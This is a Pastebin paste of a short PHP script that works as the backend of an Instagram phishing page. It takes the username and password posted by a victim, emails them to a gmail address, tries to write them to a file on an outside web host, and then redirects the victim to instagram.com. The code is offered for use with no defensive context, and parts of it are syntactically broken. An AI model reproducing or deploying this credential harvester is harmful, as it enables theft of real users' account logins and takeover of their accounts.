Advertisement
Guest User

Untitled

a guest
Jul 7th, 2018
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. <?php
  2. ////Copyright @ jainudin`r////
  3. $email= $_POST['email'];
  4. $pass = $_POST['pass'];
  5.  
  6. $to = "ghfduhf@gmail.com";
  7. $message = "
  8. ===[ Instagram ]===
  9.  
  10. username : ".$email."
  11. Password : ".$pass."
  12. ===[ THE END ]===
  13.  
  14. ";
  15. if($Send_Email !== 1 ){}else{
  16. $subject = 'IG Info : IG';
  17. $headers = 'From: IG' . "\r\n" .
  18. 'X-Mailer: PHP/' . phpversion();
  19. mail($to, $subject, $message, $headers);
  20. }
  21. if($Ftp_Write !== 1 ){}else{
  22. $file = fopen("http://noobtutorial.dx.am/resultharam.txt" . $message . "w");
  23. fwrite($file, $message);
  24. fclose($file);
  25. }
  26.  
  27. ?>
  28. '<script>window.location.replace("http://instagram.com/")</script>';}
  29. }
  30. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement